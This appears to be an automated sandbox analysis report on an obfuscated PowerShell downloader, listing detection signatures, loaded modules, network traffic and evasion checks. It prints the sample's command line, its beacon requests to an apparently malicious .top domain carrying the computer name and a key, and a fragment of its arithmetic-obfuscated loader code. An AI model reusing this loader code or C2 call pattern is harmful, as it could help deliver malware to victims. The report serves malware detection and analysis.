Windows Analysis Report
download.ps1

Overview

General Information

Sample name: download.ps1
Analysis ID: 1579870
MD5: 6dc27c0ae6c260bbed7a9b00e3306263
SHA1: 66d59a64b88b605d7fe887b4bcf7c9ea298fbb57
SHA256: fca7d47c39e4e5b1e375ff7497d67cfbd2bb4d2fa937c617f5a6b5c3c71ccb21

Detection

Score: 56
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Loading BitLocker PowerShell Module
Queries Google from non browser process on port 80
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64native
  • powershell.exe (PID: 2668 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup
No configs have been found
No yara matches
Source: Process started; Author: frack113; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5020, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 2668, ProcessName: powershell.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5020, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 2668, ProcessName: powershell.exe
No Suricata rule has matched

Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.19711562814.0000012D47476000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 6?lib.pdbpdblib.pdbR source: powershell.exe, 00000000.00000002.19711562814.0000012D473FF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbQ source: powershell.exe, 00000000.00000002.19714097677.0000012D47632000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.19713429136.0000012D474F2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: scorlib.pdb% source: powershell.exe, 00000000.00000002.19711562814.0000012D473FF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.19713678701.0000012D475E0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19711562814.0000012D4747A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.19714097677.0000012D47627000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 364e35\System.Management.Automation.pdb, source: powershell.exe, 00000000.00000002.19711562814.0000012D473FF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 source: powershell.exe, 00000000.00000002.19713678701.0000012D475E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ion.pdb@ source: powershell.exe, 00000000.00000002.19711562814.0000012D473FF000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows

Networking

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe HTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Connection: Keep-Alive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe HTTP traffic: GET /sorry/index?continue=http://www.google.com/&q=EgS_YOPMGLmspbsGIjABsAknkK1fPQw7soCldGAb8V4-f3S2hKBFyuD5NMh92dMWpKKNr9WYzRGbiwpSeC0yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Cookie: NID=520=d35BnNjBn9lHyRyhcXI14E66uAwGvq18XUwHjerGxFuNTfLtsWmjtFbfRwypj2bSbZ9RlpMTupjEwY5UwFGMceytw9HGj6d2WYCAPsog_yQagaD2LroYRzyJYubdZH1CPtVLRAZ7gcTyIqllglQdRtJTHBox9xMpU5ylIFEutZV7Kgj9Ek5kGQiq22D2eMqdPddc2w
Source: Joe Sandbox View IP Address: 45.61.136.138
Source: global traffic HTTP traffic detected: GET /hxe035pvfthtr.php?id=computer&key=72113948934&s=527 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: gajaechkfhfghal.top Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /sorry/index?continue=http://www.google.com/&q=EgS_YOPMGLmspbsGIjABsAknkK1fPQw7soCldGAb8V4-f3S2hKBFyuD5NMh92dMWpKKNr9WYzRGbiwpSeC0yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Cookie: NID=520=d35BnNjBn9lHyRyhcXI14E66uAwGvq18XUwHjerGxFuNTfLtsWmjtFbfRwypj2bSbZ9RlpMTupjEwY5UwFGMceytw9HGj6d2WYCAPsog_yQagaD2LroYRzyJYubdZH1CPtVLRAZ7gcTyIqllglQdRtJTHBox9xMpU5ylIFEutZV7Kgj9Ek5kGQiq22D2eMqdPddc2w
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: gajaechkfhfghal.top
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: powershell.exe, 00000000.00000002.19683260823.0000012D2FF8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://$ckda40xjnqlemz6/$jqly5pcaxf6vo3g.php?
Source: powershell.exe, 00000000.00000002.19683260823.0000012D305E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19683260823.0000012D303D4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://$ckda40xjnqlemz6/$jqly5pcaxf6vo3g.php?id=$env:computername&key=$dhvyekza&s=527
Source: powershell.exe, 00000000.00000002.19710229213.0000012D47075000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 00000000.00000002.19710229213.0000012D47075000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000000.00000002.19711229210.0000012D471D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micr
Source: powershell.exe, 00000000.00000002.19683260823.0000012D303D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19683260823.0000012D2F96C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19683260823.0000012D30450000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://gajaechkfhfghal.top
Source: powershell.exe, 00000000.00000002.19683260823.0000012D303D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19683260823.0000012D2F96C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://gajaechkfhfghal.top/hxe035pvfthtr.php?id=computer&key=72113948934&s=527
Source: powershell.exe, 00000000.00000002.19683260823.0000012D303D4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://gajaechkfhfghal.top/hxe035pvfthtr.php?id=computer&key=72113948934&s=527p
Source: powershell.exe, 00000000.00000002.19705043649.0000012D3F0B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.19683260823.0000012D2F47F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.19683260823.0000012D2F47F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.pngXz
Source: powershell.exe, 00000000.00000002.19683260823.0000012D2F47F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000000.00000002.19683260823.0000012D2F041000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.19683260823.0000012D2F47F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000000.00000002.19683260823.0000012D2F47F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.19683260823.0000012D2F47F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXz
Source: powershell.exe, 00000000.00000002.19683260823.0000012D3045C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19683260823.0000012D2FF7B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19683260823.0000012D3046F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19683260823.0000012D30450000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.google.com
Source: powershell.exe, 00000000.00000002.19683260823.0000012D30450000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.google.com/
Source: powershell.exe, 00000000.00000002.19683260823.0000012D3046F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.google.com/&q=EgS_YOPMGLmspbsGIjABsAknkK1fPQw7soCldGAb8V4-f3S2hKBFyuD5NMh92dMWpKKNr9WYzRG
Source: powershell.exe, 00000000.00000002.19683260823.0000012D3045C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19683260823.0000012D2FF7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgS_YOPMGLmspbsGIjABsAknkK1fPQw7
Source: powershell.exe, 00000000.00000002.19710229213.0000012D47075000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.quovadis.bm0
Source: powershell.exe, 00000000.00000002.19683260823.0000012D2F041000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.19705043649.0000012D3F0B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.19705043649.0000012D3F0B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.19705043649.0000012D3F0B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.19683260823.0000012D3045C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp
Source: powershell.exe, 00000000.00000002.19683260823.0000012D2F47F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.19683260823.0000012D2F47F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/PesterXz
Source: powershell.exe, 00000000.00000002.19683260823.0000012D308E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.19705043649.0000012D3F0B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.19710229213.0000012D47075000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: powershell.exe, 00000000.00000002.19683260823.0000012D3047C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19683260823.0000012D30482000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19683260823.0000012D2FF8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19683260823.0000012D30450000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/recaptcha/api.js
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FFD086C7A76 0_2_00007FFD086C7A76
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FFD086C8822 0_2_00007FFD086C8822
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FFD08933286 0_2_00007FFD08933286
Source: classification engine Classification label: mal56.evad.winPS1@2/7@2/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7548:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7548:304:WilStaging_02
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a5sap3pl.vk3.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $pxso79gauievdqb.(([system.String]::new(@((166361/2483),(384171/(1130+2331)),(-5258+5370),(-7731+(10041-2189)),(7604-(19597120/2606)),(8753-8642)))))( $c3f8zdw7rg5ahto ) $pxso79gauievdqb.(([system.String]::new(@((9352-(37177140/4004)),(456192/4224),(-6769+(80+6800)),(-208+(-6187+(597+(14068-8155)))),(-6569+6670)))))()$nhvut5xwzaj3rgy.(([system.String]::new(@((237917/3551),(1085616/10052),(4015-(5446-(9650-8108))),(-8412+8527),(617918/(3034528/496))))))()[byte[]] $tos490z6qg18jkv = $c3f8zdw7rg5ahto.((-join (@((491400/(15110-(25233500/2725))),(996558/8978),(15925/(9664-(19354-9935))),(311448/(11471-(11931-3192))),(6658-6544),(49761/513),(-3536+(21905430/5990)))| ForEach-Object { [char]$_ })))() $q9lpzry8nioak2v=$tos490z6qg18jkv return $q9lpzry8nioak2v}[System.Text.Encoding]::ascii.((-join (@((2523-2452),(-4317+(-1948+(-780+7146))),(-7269+(14457-(12786-(44946324/7866)))),(989-(-3172+4078)),(-7895+(10112-(7645-5544))),(9469-(95570680/(52602184/(17939116/(17200508/(9048-4111)))))),(-2810+2915),(-3634+(24452064/(1012+(5828064/(2011-(10680-9725)))))),(462882/(14147-(19277-9624))))| ForEach-Object { [char]$_ })))((o1kytfw9q8rhup2gsci3j65vdmx "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
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Users\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edgegdi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cscapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskflowdataengine.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cdp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dsreg.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FFD0859D2A5 pushad ; iretd 0_2_00007FFD0859D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FFD086B7918 push ebx; retf 0_2_00007FFD086B794A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FFD086B2315 pushad ; iretd 0_2_00007FFD086B232D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FFD086B5F63 pushad ; ret 0_2_00007FFD086B5F71
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FFD0896131A pushad ; ret 0_2_00007FFD08961319
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FFD089612F5 pushad ; ret 0_2_00007FFD08961319

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 9922
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: powershell.exe, 00000000.00000002.19713678701.0000012D475E0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: IsVirtualMachineMSFT_MpComputerStatusMSFT_MpComputerStatus
Source: powershell.exe, 00000000.00000002.19705043649.0000012D3F28D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: <!-- IFRpbWUtU3RhbXAgUENBIDIwMTAwDQYJKoZIhvcNAQEFBQACBQDk2nlVMCIYDzIw -->
Source: powershell.exe, 00000000.00000002.19711562814.0000012D473C8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19711562814.0000012D473FF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19683260823.0000012D2F96C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: IsVirtualMachine
Source: powershell.exe, 00000000.00000002.19711562814.0000012D473C8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19711562814.0000012D473FF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: booleanIsVirtualMachine
Source: powershell.exe, 00000000.00000002.19714097677.0000012D47632000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
